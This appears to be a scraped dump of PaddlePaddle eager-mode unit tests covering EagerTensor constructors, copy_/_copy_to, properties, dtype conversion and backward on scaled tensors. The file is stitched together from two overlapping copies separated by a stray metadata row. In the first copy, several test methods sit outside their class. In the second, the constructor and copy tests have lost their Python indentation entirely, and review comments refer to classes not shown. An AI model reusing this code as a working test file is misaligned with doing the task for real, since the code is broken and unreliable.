        self.assertEqual(egr_tensor1.name, "numpy_tensor1")
        self.assertEqual(egr_tensor1.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor1.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor1.stop_gradient, False)
        self.assertTrue(egr_tensor1.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor1.numpy(), arr0))
        # 4) Same overload with int64 input and flipped flags.
        arr1 = np.random.randint(100, size=(4, 16, 16, 32), dtype=np.int64)
        egr_tensor2 = core.eager.EagerTensor(arr1, place, False, True,
                                             "numpy_tensor2", True)
        self.assertEqual(egr_tensor2.persistable, False)
        self.assertEqual(egr_tensor2.name, "numpy_tensor2")
        self.assertEqual(egr_tensor2.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor2.dtype, core.VarDesc.VarType.INT64)
        self.assertEqual(egr_tensor2.stop_gradient, True)
        self.assertTrue(egr_tensor2.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor2.numpy(), arr1))
        # 5) From ndarray only: lands on the current expected place.
        arr2 = np.random.rand(4, 16, 16, 32, 64).astype('float32')
        egr_tensor3 = core.eager.EagerTensor(arr2)
        self.assertEqual(egr_tensor3.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor3.name)
        self.assertEqual(egr_tensor3.shape, [4, 16, 16, 32, 64])
        self.assertEqual(egr_tensor3.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor3.stop_gradient, True)
        self.assertTrue(
            egr_tensor3.place._equals(
                paddle.fluid.framework._current_expected_place()))
        self.assertTrue(np.array_equal(egr_tensor3.numpy(), arr2))
        # 6) Copy-construct from another EagerTensor; note the copy's
        # stop_gradient is True even though the source set it to False.
        egr_tensor3.stop_gradient = False
        egr_tensor4 = core.eager.EagerTensor(egr_tensor3)
        self.assertEqual(egr_tensor4.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor4.name)
        self.assertEqual(egr_tensor4.shape, egr_tensor3.shape)
        self.assertEqual(egr_tensor4.dtype, egr_tensor3.dtype)
        self.assertEqual(egr_tensor4.stop_gradient, True)
        self.assertTrue(
            egr_tensor4.place._equals(
                paddle.fluid.framework._current_expected_place()))
        self.assertTrue(
            np.array_equal(egr_tensor4.numpy(), egr_tensor3.numpy()))
        # 7) (ndarray, place).
        arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
        egr_tensor5 = core.eager.EagerTensor(arr4, place)
        self.assertEqual(egr_tensor5.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor5.name)
        self.assertEqual(egr_tensor5.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor5.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor5.stop_gradient, True)
        self.assertTrue(egr_tensor5.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor5.numpy(), arr4))
        # 8) (EagerTensor, place): copy to an explicit place.
        egr_tensor6 = core.eager.EagerTensor(egr_tensor5, core.CPUPlace())
        self.assertEqual(egr_tensor6.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor6.name)
        self.assertEqual(egr_tensor6.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor6.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor6.stop_gradient, True)
        self.assertEqual(egr_tensor6.place.is_cpu_place(), True)
        self.assertTrue(
            np.array_equal(egr_tensor6.numpy(), egr_tensor5.numpy()))
        # 9) (ndarray, place, persistable).
        egr_tensor7 = core.eager.EagerTensor(arr4, place, True)
        self.assertEqual(egr_tensor7.persistable, True)
        self.assertTrue("generated_tensor" in egr_tensor7.name)
        self.assertEqual(egr_tensor7.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor7.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor7.stop_gradient, True)
        self.assertTrue(egr_tensor7.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor7.numpy(), arr4))
        # 10) (EagerTensor, place, name).
        egr_tensor8 = core.eager.EagerTensor(egr_tensor6, place, "egr_tensor8")
        self.assertEqual(egr_tensor8.persistable, False)
        self.assertEqual(egr_tensor8.name, "egr_tensor8")
        self.assertEqual(egr_tensor8.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor8.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor8.stop_gradient, True)
        self.assertTrue(egr_tensor8.place._equals(place))
        self.assertTrue(
            np.array_equal(egr_tensor8.numpy(), egr_tensor5.numpy()))
        # 11) (ndarray, place, persistable, zero_copy).
        egr_tensor9 = core.eager.EagerTensor(arr4, place, True, True)
        self.assertEqual(egr_tensor9.persistable, True)
        self.assertTrue("generated_tensor" in egr_tensor9.name)
        self.assertEqual(egr_tensor9.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor9.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor9.stop_gradient, True)
        self.assertTrue(egr_tensor9.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor9.numpy(), arr4))
        # 12) Construct from a framework (LoD) Tensor.
        x = np.random.rand(3, 3).astype('float32')
        t = paddle.fluid.Tensor()
        t.set(x, paddle.fluid.CPUPlace())
        egr_tensor10 = core.eager.EagerTensor(t, place)
        self.assertEqual(egr_tensor10.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor10.name)
        self.assertEqual(egr_tensor10.shape, [3, 3])
        self.assertEqual(egr_tensor10.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor10.stop_gradient, True)
        self.assertTrue(egr_tensor10.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor10.numpy(), x))
        # 12b) Framework Tensor with an explicit name.
        egr_tensor11 = core.eager.EagerTensor(t, place, "framework_constructed")
        self.assertEqual(egr_tensor11.persistable, False)
        self.assertTrue("framework_constructed" in egr_tensor11.name)
        self.assertEqual(egr_tensor11.shape, [3, 3])
        self.assertEqual(egr_tensor11.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor11.stop_gradient, True)
        self.assertTrue(egr_tensor11.place._equals(place))
        self.assertTrue(np.array_equal(egr_tensor11.numpy(), x))
        # 12c) Framework Tensor only: defaults to CPUPlace.
        egr_tensor12 = core.eager.EagerTensor(t)
        self.assertEqual(egr_tensor12.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor12.name)
        self.assertEqual(egr_tensor12.shape, [3, 3])
        self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor12.stop_gradient, True)
        self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
        self.assertTrue(np.array_equal(egr_tensor12.numpy(), x))
        # 13) EagerParamBase argument validation.
        with self.assertRaisesRegexp(
                ValueError, "The shape of Parameter should not be None"):
            eager_param = EagerParamBase(shape=None, dtype="float32")
        with self.assertRaisesRegexp(
                ValueError, "The dtype of Parameter should not be None"):
            eager_param = EagerParamBase(shape=[1, 1], dtype=None)
        with self.assertRaisesRegexp(
                ValueError,
                "The dimensions of shape for Parameter must be greater than 0"):
            eager_param = EagerParamBase(shape=[], dtype="float32")
        with self.assertRaisesRegexp(
                ValueError,
                "Each dimension of shape for Parameter must be greater than 0, but received /*"
        ):
            eager_param = EagerParamBase(shape=[-1], dtype="float32")
        # 14) trainable flag: defaults to True, settable, must be a bool.
        eager_param = EagerParamBase(shape=[1, 1], dtype="float32")
        self.assertTrue(eager_param.trainable)
        eager_param.trainable = False
        self.assertFalse(eager_param.trainable)
        with self.assertRaisesRegexp(
                ValueError,
                "The type of trainable MUST be bool, but the type is /*"):
            eager_param.trainable = "False"
def test_constructor(self):
    """Run the constructor checks on every available place."""
    print("Test_constructor")
    paddle.set_device("cpu")
    places = [core.CPUPlace()]
    if core.is_compiled_with_cuda():
        places.append(core.CUDAPlace(0))
    with _test_eager_guard():
        for place in places:
            self.constructor(place)
def test_copy_and_copy_to(self):
    """copy_ copies value and metadata in place; _copy_to moves to a place.

    FIX: several asserts were written ``self.assertTrue(x, True)`` — the
    second positional argument of assertTrue is the failure *message*, not
    an expected value, so the trailing ``True`` was dead and misleading.
    The spurious arguments are dropped; assertion semantics are unchanged.
    """
    print("Test_copy_and_copy_to")
    with _test_eager_guard():
        paddle.set_device("cpu")
        arr = np.ones([4, 16, 16, 32]).astype('float32')
        arr1 = np.zeros([4, 16]).astype('float32')
        arr2 = np.ones([4, 16, 16, 32]).astype('float32') + np.ones(
            [4, 16, 16, 32]).astype('float32')
        tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
                                  core.CPUPlace())
        self.assertEqual(tensor.stop_gradient, True)
        tensor.stop_gradient = False
        print("Set persistable")
        tensor.persistable = False
        tensor1 = paddle.to_tensor(arr1, core.VarDesc.VarType.FP32,
                                   core.CPUPlace())
        tensor1.persistable = True
        self.assertEqual(tensor1.stop_gradient, True)
        self.assertTrue(np.array_equal(tensor.numpy(), arr))
        print("Test copy_")
        # copy_ overwrites value, shape and persistable in place.
        tensor.copy_(tensor1, True)
        self.assertEqual(tensor.persistable, True)
        self.assertEqual(tensor.shape, [4, 16])
        self.assertEqual(tensor.dtype, core.VarDesc.VarType.FP32)
        self.assertTrue(np.array_equal(tensor.numpy(), arr1))
        print("Test _copy_to")
        tensor2 = paddle.to_tensor(arr2, core.VarDesc.VarType.FP32,
                                   core.CPUPlace())
        self.assertTrue(np.array_equal(tensor2.numpy(), arr2))
        self.assertTrue(tensor2.place.is_cpu_place())
        tensor2.persistable = True
        tensor2.stop_gradient = False
        if core.is_compiled_with_cuda():
            tensor3 = tensor2._copy_to(True, core.CUDAPlace(0))
            self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
            self.assertTrue(tensor3.persistable)
            self.assertTrue(tensor3.stop_gradient)
            self.assertTrue(tensor3.place.is_gpu_place())
        else:
            tensor3 = tensor2._copy_to(True, core.CPUPlace())
            self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
            self.assertTrue(tensor3.persistable)
            self.assertTrue(tensor3.stop_gradient)
            self.assertTrue(tensor3.place.is_cpu_place())
def test_properties(self):
    """name / persistable / place / stop_gradient accessors round-trip."""
    print("Test_properties")
    with _test_eager_guard():
        paddle.set_device("cpu")
        arr = np.ones([4, 16, 16, 32]).astype('float32')
        tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
                                  core.CPUPlace())
        self.assertEqual(tensor.shape, [4, 16, 16, 32])
        tensor.name = 'tensor_name_test'
        self.assertEqual(tensor.name, 'tensor_name_test')
        self.assertEqual(tensor.persistable, False)
        tensor.persistable = True
        self.assertEqual(tensor.persistable, True)
        tensor.persistable = False
        self.assertEqual(tensor.persistable, False)
        self.assertTrue(tensor.place.is_cpu_place())
        self.assertEqual(tensor._place_str, 'CPUPlace')
        self.assertEqual(tensor.stop_gradient, True)
        tensor.stop_gradient = False
        self.assertEqual(tensor.stop_gradient, False)
        tensor.stop_gradient = True
        self.assertEqual(tensor.stop_gradient, True)
def test_global_properties(self):
    """_in_eager_mode flips to True only inside _test_eager_guard."""
    print("Test_global_properties")
    self.assertFalse(core._in_eager_mode())
    with _test_eager_guard():
        self.assertTrue(core._in_eager_mode())
    self.assertFalse(core._in_eager_mode())

def test_place_guard(self):
    """_dygraph_place_guard must override the eager expected place."""
    core._enable_eager_mode()
    if core.is_compiled_with_cuda():
        paddle.set_device("gpu:0")
        with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
            self.assertTrue(core.eager._get_expected_place().is_cpu_place())
    else:
        paddle.set_device("cpu")
        with paddle.fluid.framework._dygraph_place_guard(core.CPUPlace()):
            self.assertTrue(core.eager._get_expected_place().is_cpu_place())
    # Restore global state so later tests do not run in eager mode.
    core._disable_eager_mode()
class EagerParamBaseUsageTestCase(unittest.TestCase):
    """EagerParamBase usage: printing, copying, initializers, to_variable,
    and backward on a single tensor."""

    def test_print(self):
        with _test_eager_guard():
            linear = paddle.nn.Linear(3, 3, bias_attr=False)
            print(linear.weight)

    def test_copy(self):
        """deepcopy and _copy_to must preserve parameter values."""
        with _test_eager_guard():
            linear = paddle.nn.Linear(1, 3)
            linear_copy = copy.deepcopy(linear)
            linear_copy2 = linear.weight._copy_to(core.CPUPlace(), True)
            self.assertTrue(
                np.array_equal(linear.weight.numpy(),
                               linear_copy.weight.numpy()))
            self.assertTrue(
                np.array_equal(linear.weight.numpy(), linear_copy2.numpy()))

    # NOTE(review): "initilaizer" is a typo for "initializer"; kept as-is
    # to avoid touching the call sites below.
    def func_fp16_initilaizer(self):
        """Build fp16 Linears under several initializers; return the weights."""
        paddle.set_default_dtype("float16")
        linear1 = paddle.nn.Linear(1, 3, bias_attr=False)
        linear2 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.Uniform())
        linear3 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.TruncatedNormalInitializer())
        linear4 = paddle.nn.Linear(
            1,
            3,
            bias_attr=False,
            weight_attr=paddle.fluid.initializer.MSRAInitializer())
        res = [
            linear1.weight.numpy(), linear2.weight.numpy(),
            linear3.weight.numpy(), linear4.weight.numpy()
        ]
        # Restore the default dtype so later tests are unaffected.
        paddle.set_default_dtype("float32")
        return res

    def test_fp16_initializer(self):
        """Same seed must give identical fp16 init in eager and legacy modes."""
        res1 = list()
        res2 = list()
        paddle.seed(102)
        paddle.framework.random._manual_program_seed(102)
        with _test_eager_guard():
            res1 = self.func_fp16_initilaizer()
        res2 = self.func_fp16_initilaizer()
        for i in range(len(res1)):
            self.assertTrue(np.array_equal(res1[i], res2[i]))

    def func_layer_helper_base(self, value):
        base = paddle.fluid.layer_helper_base.LayerHelperBase("test_layer",
                                                              "test_layer")
        return base.to_variable(value).numpy()

    def func_base_to_variable(self, value):
        # Return value is intentionally unused (None) — only checks that
        # to_variable does not raise in either mode.
        paddle.fluid.dygraph.base.to_variable(value)

    def test_to_variable(self):
        """to_variable must behave the same inside and outside eager mode."""
        value = np.random.rand(4, 16, 16, 32).astype('float32')
        res1 = None
        res3 = None
        with _test_eager_guard():
            res1 = self.func_layer_helper_base(value)
            res3 = self.func_base_to_variable(value)
        res2 = self.func_layer_helper_base(value)
        res4 = self.func_base_to_variable(value)
        self.assertTrue(np.array_equal(res1, res2))
        # res3/res4 are both None (func_base_to_variable returns nothing),
        # so this only asserts neither call raised.
        self.assertTrue(np.array_equal(res3, res4))

    def test_backward_with_single_tensor(self):
        """backward() on a lone tensor fills its grad with ones."""
        arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
        egr_tensor12 = core.eager.EagerTensor(arr4, core.CPUPlace())
        egr_tensor12.retain_grads()
        arr = np.ones([4, 16, 16, 32]).astype('float32')
        self.assertEqual(egr_tensor12.persistable, False)
        self.assertTrue("generated_tensor" in egr_tensor12.name)
        self.assertEqual(egr_tensor12.shape, [4, 16, 16, 32])
        self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
        self.assertEqual(egr_tensor12.stop_gradient, True)
        self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
        self.assertTrue(np.array_equal(egr_tensor12.numpy(), arr4))
        # Before backward the gradient is None.
        self.assertTrue(np.array_equal(egr_tensor12.gradient(), None))
        egr_tensor12.backward()
        self.assertTrue(np.array_equal(egr_tensor12.gradient(), arr))
class EagerGuardTestCase(unittest.TestCase):
    """_test_eager_guard must enable eager mode within its scope."""

    def test__test_eager_guard(self):
        tracer = paddle.fluid.dygraph.tracer.Tracer()
        with _test_eager_guard(tracer):
            self.assertTrue(_in_eager_mode())


if __name__ == "__main__":
    # Allow running this test file directly.
    unittest.main()
| 46.686071 | 95 | 0.642679 |
import paddle.fluid.core as core
import paddle.fluid.eager.eager_tensor_patch_methods as eager_tensor_patch_methods
import paddle
import numpy as np
from paddle.fluid.framework import _test_eager_guard, EagerParamBase, _in_eager_mode
from paddle.fluid.data_feeder import convert_dtype
import unittest
import copy
# NOTE(review): this appears to be a second, comment-stripped copy of the
# same test file embedded by the dataset pipeline (see the metadata rows
# above); the class is identical to the EagerScaleTestCase defined earlier.
class EagerScaleTestCase(unittest.TestCase):
    """core.eager.scale smoke tests plus backward() behaviour (duplicate copy)."""

    def test_scale_base(self):
        with _test_eager_guard():
            paddle.set_device("cpu")
            arr = np.ones([4, 16, 16, 32]).astype('float32')
            tensor = paddle.to_tensor(arr, 'float32', core.CPUPlace())
            print(tensor)
            tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
            for i in range(0, 100):
                tensor = core.eager.scale(tensor, 2.0, 0.9, True, False)
            print(tensor)
            self.assertEqual(tensor.shape, [4, 16, 16, 32])
            self.assertEqual(tensor.stop_gradient, True)

    def test_retain_grad_and_run_backward(self):
        with _test_eager_guard():
            paddle.set_device("cpu")
            input_data = np.ones([4, 16, 16, 32]).astype('float32')
            data_eager = paddle.to_tensor(input_data, 'float32',
                                          core.CPUPlace(), False)
            grad_data = np.ones([4, 16, 16, 32]).astype('float32')
            grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
            data_eager.retain_grads()
            out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
            self.assertFalse(data_eager.grad._is_initialized())
            out_eager.backward(grad_eager, False)
            self.assertTrue(data_eager.grad._is_initialized())
            self.assertTrue(np.array_equal(data_eager.grad.numpy(), input_data))

    def test_retain_grad_and_run_backward_raises(self):
        with _test_eager_guard():
            paddle.set_device("cpu")
            input_data = np.ones([4, 16, 16, 32]).astype('float32')
            data_eager = paddle.to_tensor(input_data, 'float32',
                                          core.CPUPlace(), False)
            grad_data = np.ones([4, 16, 16, 32]).astype('float32')
            grad_data2 = np.ones([4, 16]).astype('float32')
            grad_eager = paddle.to_tensor(grad_data, 'float32', core.CPUPlace())
            grad_eager2 = paddle.to_tensor(grad_data2, 'float32',
                                           core.CPUPlace())
            data_eager.retain_grads()
            out_eager = core.eager.scale(data_eager, 1.0, 0.9, True, True)
            self.assertFalse(data_eager.grad._is_initialized())
            with self.assertRaisesRegexp(
                    AssertionError,
                    "The type of grad_tensor must be paddle.Tensor"):
                out_eager.backward(grad_data, False)
            with self.assertRaisesRegexp(
                    AssertionError,
                    "Tensor shape not match, Tensor of grad_tensor /*"):
                out_eager.backward(grad_eager2, False)
# NOTE(review): duplicate of the EagerDtypeTestCase defined earlier in this
# dump (comment-stripped copy from the dataset pipeline).
class EagerDtypeTestCase(unittest.TestCase):
    """paddle.to_tensor must preserve every supported numpy dtype."""

    def check_to_tesnsor_and_numpy(self, dtype, proto_dtype):
        # "tesnsor" typo preserved to match call sites.
        with _test_eager_guard():
            arr = np.random.random([4, 16, 16, 32]).astype(dtype)
            tensor = paddle.to_tensor(arr, dtype)
            self.assertEqual(tensor.dtype, proto_dtype)
            self.assertTrue(np.array_equal(arr, tensor.numpy()))

    def test_dtype_base(self):
        print("Test_dtype")
        self.check_to_tesnsor_and_numpy('bool', core.VarDesc.VarType.BOOL)
        self.check_to_tesnsor_and_numpy('int8', core.VarDesc.VarType.INT8)
        self.check_to_tesnsor_and_numpy('uint8', core.VarDesc.VarType.UINT8)
        self.check_to_tesnsor_and_numpy('int16', core.VarDesc.VarType.INT16)
        self.check_to_tesnsor_and_numpy('int32', core.VarDesc.VarType.INT32)
        self.check_to_tesnsor_and_numpy('int64', core.VarDesc.VarType.INT64)
        self.check_to_tesnsor_and_numpy('float16', core.VarDesc.VarType.FP16)
        self.check_to_tesnsor_and_numpy('float32', core.VarDesc.VarType.FP32)
        self.check_to_tesnsor_and_numpy('float64', core.VarDesc.VarType.FP64)
        self.check_to_tesnsor_and_numpy('complex64',
                                        core.VarDesc.VarType.COMPLEX64)
        self.check_to_tesnsor_and_numpy('complex128',
                                        core.VarDesc.VarType.COMPLEX128)
class EagerTensorPropertiesTestCase(unittest.TestCase):
def constructor(self, place):
egr_tensor = core.eager.EagerTensor()
self.assertEqual(egr_tensor.persistable, False)
self.assertTrue("generated" in egr_tensor.name)
self.assertEqual(egr_tensor.shape, [])
self.assertEqual(egr_tensor.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor.stop_gradient, True)
egr_tensor0 = core.eager.EagerTensor(
core.VarDesc.VarType.FP32, [4, 16, 16, 32], "test_eager_tensor",
core.VarDesc.VarType.LOD_TENSOR, True)
self.assertEqual(egr_tensor0.persistable, True)
self.assertEqual(egr_tensor0.name, "test_eager_tensor")
self.assertEqual(egr_tensor0.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor0.dtype, core.VarDesc.VarType.FP32)
arr0 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor1 = core.eager.EagerTensor(arr0, place, True, False,
"numpy_tensor1", False)
self.assertEqual(egr_tensor1.persistable, True)
self.assertEqual(egr_tensor1.name, "numpy_tensor1")
self.assertEqual(egr_tensor1.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor1.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor1.stop_gradient, False)
self.assertTrue(egr_tensor1.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor1.numpy(), arr0))
arr1 = np.random.randint(100, size=(4, 16, 16, 32), dtype=np.int64)
egr_tensor2 = core.eager.EagerTensor(arr1, place, False, True,
"numpy_tensor2", True)
self.assertEqual(egr_tensor2.persistable, False)
self.assertEqual(egr_tensor2.name, "numpy_tensor2")
self.assertEqual(egr_tensor2.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor2.dtype, core.VarDesc.VarType.INT64)
self.assertEqual(egr_tensor2.stop_gradient, True)
self.assertTrue(egr_tensor2.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor2.numpy(), arr1))
arr2 = np.random.rand(4, 16, 16, 32, 64).astype('float32')
egr_tensor3 = core.eager.EagerTensor(arr2)
self.assertEqual(egr_tensor3.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor3.name)
self.assertEqual(egr_tensor3.shape, [4, 16, 16, 32, 64])
self.assertEqual(egr_tensor3.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor3.stop_gradient, True)
self.assertTrue(
egr_tensor3.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(np.array_equal(egr_tensor3.numpy(), arr2))
egr_tensor3.stop_gradient = False
egr_tensor4 = core.eager.EagerTensor(egr_tensor3)
self.assertEqual(egr_tensor4.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor4.name)
self.assertEqual(egr_tensor4.shape, egr_tensor3.shape)
self.assertEqual(egr_tensor4.dtype, egr_tensor3.dtype)
self.assertEqual(egr_tensor4.stop_gradient, True)
self.assertTrue(
egr_tensor4.place._equals(
paddle.fluid.framework._current_expected_place()))
self.assertTrue(
np.array_equal(egr_tensor4.numpy(), egr_tensor3.numpy()))
arr4 = np.random.rand(4, 16, 16, 32).astype('float32')
egr_tensor5 = core.eager.EagerTensor(arr4, place)
self.assertEqual(egr_tensor5.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor5.name)
self.assertEqual(egr_tensor5.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor5.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor5.stop_gradient, True)
self.assertTrue(egr_tensor5.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor5.numpy(), arr4))
egr_tensor6 = core.eager.EagerTensor(egr_tensor5, core.CPUPlace())
self.assertEqual(egr_tensor6.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor6.name)
self.assertEqual(egr_tensor6.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor6.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor6.stop_gradient, True)
self.assertEqual(egr_tensor6.place.is_cpu_place(), True)
self.assertTrue(
np.array_equal(egr_tensor6.numpy(), egr_tensor5.numpy()))
egr_tensor7 = core.eager.EagerTensor(arr4, place, True)
self.assertEqual(egr_tensor7.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor7.name)
self.assertEqual(egr_tensor7.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor7.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor7.stop_gradient, True)
self.assertTrue(egr_tensor7.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor7.numpy(), arr4))
egr_tensor8 = core.eager.EagerTensor(egr_tensor6, place, "egr_tensor8")
self.assertEqual(egr_tensor8.persistable, False)
self.assertEqual(egr_tensor8.name, "egr_tensor8")
self.assertEqual(egr_tensor8.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor8.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor8.stop_gradient, True)
self.assertTrue(egr_tensor8.place._equals(place))
self.assertTrue(
np.array_equal(egr_tensor8.numpy(), egr_tensor5.numpy()))
egr_tensor9 = core.eager.EagerTensor(arr4, place, True, True)
self.assertEqual(egr_tensor9.persistable, True)
self.assertTrue("generated_tensor" in egr_tensor9.name)
self.assertEqual(egr_tensor9.shape, [4, 16, 16, 32])
self.assertEqual(egr_tensor9.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor9.stop_gradient, True)
self.assertTrue(egr_tensor9.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor9.numpy(), arr4))
x = np.random.rand(3, 3).astype('float32')
t = paddle.fluid.Tensor()
t.set(x, paddle.fluid.CPUPlace())
egr_tensor10 = core.eager.EagerTensor(t, place)
self.assertEqual(egr_tensor10.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor10.name)
self.assertEqual(egr_tensor10.shape, [3, 3])
self.assertEqual(egr_tensor10.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor10.stop_gradient, True)
self.assertTrue(egr_tensor10.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor10.numpy(), x))
egr_tensor11 = core.eager.EagerTensor(t, place, "framework_constructed")
self.assertEqual(egr_tensor11.persistable, False)
self.assertTrue("framework_constructed" in egr_tensor11.name)
self.assertEqual(egr_tensor11.shape, [3, 3])
self.assertEqual(egr_tensor11.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor11.stop_gradient, True)
self.assertTrue(egr_tensor11.place._equals(place))
self.assertTrue(np.array_equal(egr_tensor11.numpy(), x))
egr_tensor12 = core.eager.EagerTensor(t)
self.assertEqual(egr_tensor12.persistable, False)
self.assertTrue("generated_tensor" in egr_tensor12.name)
self.assertEqual(egr_tensor12.shape, [3, 3])
self.assertEqual(egr_tensor12.dtype, core.VarDesc.VarType.FP32)
self.assertEqual(egr_tensor12.stop_gradient, True)
self.assertTrue(egr_tensor12.place._equals(paddle.fluid.CPUPlace()))
self.assertTrue(np.array_equal(egr_tensor12.numpy(), x))
with self.assertRaisesRegexp(
ValueError, "The shape of Parameter should not be None"):
eager_param = EagerParamBase(shape=None, dtype="float32")
with self.assertRaisesRegexp(
ValueError, "The dtype of Parameter should not be None"):
eager_param = EagerParamBase(shape=[1, 1], dtype=None)
with self.assertRaisesRegexp(
ValueError,
"The dimensions of shape for Parameter must be greater than 0"):
eager_param = EagerParamBase(shape=[], dtype="float32")
with self.assertRaisesRegexp(
ValueError,
"Each dimension of shape for Parameter must be greater than 0, but received /*"
):
eager_param = EagerParamBase(shape=[-1], dtype="float32")
eager_param = EagerParamBase(shape=[1, 1], dtype="float32")
self.assertTrue(eager_param.trainable)
eager_param.trainable = False
self.assertFalse(eager_param.trainable)
with self.assertRaisesRegexp(
ValueError,
"The type of trainable MUST be bool, but the type is /*"):
eager_param.trainable = "False"
    def test_constructor(self):
        """Run the shared ``constructor`` checks on every available place.

        CPU is always exercised; GPU place 0 is added when the build was
        compiled with CUDA support.
        """
        print("Test_constructor")
        paddle.set_device("cpu")
        place_list = [core.CPUPlace()]
        if core.is_compiled_with_cuda():
            place_list.append(core.CUDAPlace(0))
        # All constructor variants must behave identically in eager mode.
        with _test_eager_guard():
            for p in place_list:
                self.constructor(p)
def test_copy_and_copy_to(self):
print("Test_copy_and_copy_to")
with _test_eager_guard():
paddle.set_device("cpu")
arr = np.ones([4, 16, 16, 32]).astype('float32')
arr1 = np.zeros([4, 16]).astype('float32')
arr2 = np.ones([4, 16, 16, 32]).astype('float32') + np.ones(
[4, 16, 16, 32]).astype('float32')
tensor = paddle.to_tensor(arr, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertEqual(tensor.stop_gradient, True)
tensor.stop_gradient = False
print("Set persistable")
tensor.persistable = False
tensor1 = paddle.to_tensor(arr1, core.VarDesc.VarType.FP32,
core.CPUPlace())
tensor1.persistable = True
self.assertEqual(tensor1.stop_gradient, True)
self.assertTrue(np.array_equal(tensor.numpy(), arr))
print("Test copy_")
tensor.copy_(tensor1, True)
self.assertEqual(tensor.persistable, True)
self.assertEqual(tensor.shape, [4, 16])
self.assertEqual(tensor.dtype, core.VarDesc.VarType.FP32)
self.assertTrue(np.array_equal(tensor.numpy(), arr1))
print("Test _copy_to")
tensor2 = paddle.to_tensor(arr2, core.VarDesc.VarType.FP32,
core.CPUPlace())
self.assertTrue(np.array_equal(tensor2.numpy(), arr2))
self.assertTrue(tensor2.place.is_cpu_place())
tensor2.persistable = True
tensor2.stop_gradient = False
if core.is_compiled_with_cuda():
tensor3 = tensor2._copy_to(True, core.CUDAPlace(0))
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_gpu_place())
else:
tensor3 = tensor2._copy_to(True, core.CPUPlace())
self.assertTrue(np.array_equal(tensor3.numpy(), arr2))
self.assertTrue(tensor3.persistable, True)
self.assertTrue(tensor3.stop_gradient, True)
self.assertTrue(tensor3.place.is_cpu_place())
